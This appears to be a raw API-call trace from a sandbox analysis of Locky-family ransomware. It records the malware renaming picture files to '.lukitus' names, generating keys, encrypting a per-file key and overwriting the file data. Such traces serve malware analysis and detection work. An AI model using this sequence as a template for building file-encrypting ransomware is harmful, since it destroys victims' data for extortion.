CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.626] CreateFileW (lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.627] MoveFileExW (lpExistingFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), lpNewFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\F56924BE-9663-41BB-D0039C86-9E680BA77E12.lukitus" (normalized: "c:\\users\\public\\pictures\\sample pictures\\f56924be-9663-41bb-d0039c86-9e680ba77e12.lukitus"), dwFlags=0x9) returned 1 [0107.628] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.628] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.633] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0107.638] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.638] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0107.639] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x3ea1f, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x3ea1f, lpOverlapped=0x0) returned 1 [0107.640] SetFilePointer (in: hFile=0x328, lDistanceToMove=524288, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x80000 [0107.640] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x3ea1f, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x3ea1f, lpOverlapped=0x0) returned 1 [0107.640] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x642f40d0, dwHighDateTime=0x1d31760)) [0107.641] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.641] FlushFileBuffers (hFile=0x328) returned 1 [0107.653] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\9A8DdJheRUIQ_Ny.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\9a8ddjheruiq_ny.jpg"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a40dc0, ftCreationTime.dwHighDateTime=0x1d2fd85, ftLastAccessTime.dwLowDateTime=0xdd39f8a0, ftLastAccessTime.dwHighDateTime=0x1d3034f, ftLastWriteTime.dwLowDateTime=0xdd39f8a0, ftLastWriteTime.dwHighDateTime=0x1d3034f, nFileSizeHigh=0x0, nFileSizeLow=0x182ef)) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.654] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\9A8DdJheRUIQ_Ny.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\9a8ddjheruiq_ny.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.654] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\9A8DdJheRUIQ_Ny.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\9a8ddjheruiq_ny.jpg"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\F56924BE-9663-41BB-16DB964B-DDB43481F1DB.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\f56924be-9663-41bb-16db964b-ddb43481f1db.lukitus"), dwFlags=0x9) returned 1 [0107.655] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.655] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.660] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x182ef, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x182ef, lpOverlapped=0x0) returned 1 [0107.661] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.661] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x182ef, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x182ef, lpOverlapped=0x0) returned 1 [0107.661] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.662] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6431a230, dwHighDateTime=0x1d31760)) [0107.662] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.662] FlushFileBuffers (hFile=0x328) returned 1 [0107.665] GetFileAttributesExW (in: lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8907c)) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.666] CreateFileW (lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.666] MoveFileExW (lpExistingFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), lpNewFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\F56924BE-9663-41BB-8EA4D603-5A2874FAE3FC.lukitus" (normalized: "c:\\users\\public\\pictures\\sample pictures\\f56924be-9663-41bb-8ea4d603-5a2874fae3fc.lukitus"), dwFlags=0x9) returned 1 [0107.667] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.667] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.672] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0107.677] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.677] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0107.678] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x907c, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x907c, lpOverlapped=0x0) returned 1 [0107.679] SetFilePointer (in: hFile=0x328, lDistanceToMove=524288, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x80000 [0107.679] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x907c, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x907c, lpOverlapped=0x0) returned 1 [0107.679] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.679] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64340390, dwHighDateTime=0x1d31760)) [0107.679] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.679] FlushFileBuffers (hFile=0x328) returned 1 [0107.689] GetFileAttributesExW (in: lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbde6b)) returned 1 [0107.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.689] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.690] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.690] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.690] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.690] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.690] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.690] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.690] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.690] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.690] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.690] CreateFileW (lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.690] MoveFileExW (lpExistingFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), lpNewFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\F56924BE-9663-41BB-BEA9B2D7-58D4FA770E74.lukitus" (normalized: "c:\\users\\public\\pictures\\sample pictures\\f56924be-9663-41bb-bea9b2d7-58d4fa770e74.lukitus"), dwFlags=0x9) returned 1 [0107.691] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.691] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.696] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0107.704] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.704] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0107.707] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x3de6b, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x3de6b, lpOverlapped=0x0) returned 1 [0107.708] SetFilePointer (in: hFile=0x328, lDistanceToMove=524288, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x80000 [0107.708] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x3de6b, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x3de6b, lpOverlapped=0x0) returned 1 [0107.708] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.709] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6438c650, dwHighDateTime=0x1d31760)) [0107.709] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.709] FlushFileBuffers (hFile=0x328) returned 1 [0107.726] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\NHG0O.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\nhg0o.jpg"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91be8820, ftCreationTime.dwHighDateTime=0x1d303c5, ftLastAccessTime.dwLowDateTime=0x1c835ad0, ftLastAccessTime.dwHighDateTime=0x1d2f75f, ftLastWriteTime.dwLowDateTime=0x1c835ad0, ftLastWriteTime.dwHighDateTime=0x1d2f75f, nFileSizeHigh=0x0, nFileSizeLow=0x640)) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.726] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.727] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 